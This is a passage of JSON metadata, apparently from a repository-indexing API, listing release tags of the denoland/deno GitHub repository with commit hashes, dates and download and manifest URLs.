manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url"